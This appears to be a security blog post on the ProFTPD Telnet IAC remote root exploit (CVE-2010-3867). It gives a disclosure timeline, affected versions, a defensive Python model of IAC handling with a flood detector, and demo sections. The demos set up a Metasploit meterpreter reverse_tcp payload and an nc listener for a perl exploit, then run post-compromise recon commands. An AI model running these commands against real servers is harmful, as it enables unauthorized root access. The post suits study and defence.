CVE-2010-3867 : ProFTPD IAC Remote Root Exploit
Timeline :
Vulnerability reported to vendor by ZDI on 2010-09-24
Coordinated public release of advisory on 2010-11-02
Metasploit exploit released on 2010-11-05
Exploit-DB exploit released on 2010-11-07
PoC provided by :
jduck for Metasploit exploit
Kingcope for Exploit-DB exploit
Reference(s) :
Affected version(s) :
ProFTPD versions between 1.3.2rc3 and 1.3.3b
Tested on Debian Squeeze with :
ProFTPD proftpd-basic_1.3.3a-4_i386.deb
Description :
This module exploits a stack-based buffer overflow in ProFTPD server versions 1.3.2rc3 through 1.3.3b. By sending data containing a large number of Telnet IAC commands, an attacker can corrupt memory and execute arbitrary code.
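As an added illustration (not ProFTPD's own netio.c code), a simplified, bounds-checked model of how Telnet IAC sequences are stripped from an FTP control-channel line, together with a heuristic that flags the IAC-flooding pattern the description mentions; the buffer size, threshold and sample lines are constructed assumptions.

```python
# Added example: simplified model of Telnet IAC handling on an FTP control
# connection (RFC 854 escaping), written defensively so the output buffer
# can never be overrun. Not ProFTPD's pr_netio_telnet_gets(); illustrative only.

IAC, DONT, DO, WONT, WILL = 255, 254, 253, 252, 251
OPTION_NEGOTIATION = {WILL, WONT, DO, DONT}  # three-byte IAC <cmd> <option>

def telnet_gets(data: bytes, bufsize: int = 64):
    """Copy one command line into a buffer of at most `bufsize` bytes,
    removing Telnet IAC sequences. Returns (command_bytes, iac_count).
    Every write is length-checked first; exceeding the buffer raises
    ValueError instead of corrupting memory. bufsize is an assumption."""
    out = bytearray()
    iac_count = 0
    i = 0
    while i < len(data):
        c = data[i]
        if c == IAC:
            iac_count += 1
            nxt = data[i + 1] if i + 1 < len(data) else None
            if nxt is None:
                break                      # truncated IAC at end of input
            if nxt == IAC:
                payload = bytes([IAC])     # IAC IAC = one literal 0xFF byte
                i += 2
            elif nxt in OPTION_NEGOTIATION:
                i += 3                     # drop IAC WILL/WONT/DO/DONT <opt>
                continue
            else:
                i += 2                     # drop any other IAC <cmd> pair
                continue
        else:
            payload = bytes([c])
            i += 1
        if len(out) + len(payload) > bufsize:   # the check that matters
            raise ValueError("command line exceeds buffer size")
        out += payload
        if payload == b"\n":
            break                          # end of the FTP command line
    return bytes(out), iac_count

def fits_in_buffer(data: bytes, bufsize: int = 64) -> bool:
    """True if the line can be processed without exceeding the buffer."""
    try:
        telnet_gets(data, bufsize)
        return True
    except ValueError:
        return False

def looks_like_iac_flood(data: bytes, threshold: int = 8) -> bool:
    """Detection heuristic: a normal FTP client sends at most a few IAC
    bytes per line (e.g. IAC IP before ABOR); dozens is the pattern the
    advisory describes. The threshold is a constructed assumption."""
    return data.count(bytes([IAC])) >= threshold
```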
Metasploit Demo :
use exploit/linux/ftp/proftp_telnet_iac
set RHOST 192.168.178.40
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sysinfo
getuid
ipconfig
Exploit-DB demo :
nc -lvn 45295
perl proftpd_iac.pl 192.168.178.40 192.168.178.21 5
id
uname -a
ifconfig
I recommend that you read these related posts:
- CVE-2010-3867 : You wanna play with ProFTPD ?
- OSVDB-69562 : ProFTPD 1.3.3c Backdoor Command Execution
- SUC028 : ProFTPD Backdoor Inbound Backdoor Open Request (ACIDBITCHEZ)
- vsftpd v2.3.4 Backdoor Command Execution
- Anonymous FTP scanning differences between Metasploit and Nmap
- IIS5 & 6 FTP Stack Overflow 0day
- SUC020 : Potential FTP non anonymous Login and/or Brute-Force attempt
- MS10-018 : Microsoft Internet Explorer Tabular Data Control ActiveX Memory Corruption
- CVE-2012-0217 Intel’s sysret Kernel Privilege Escalation on FreeBSD Demo
- Foxit Reader Plugin URL Processing Vulnerability Metasploit Demo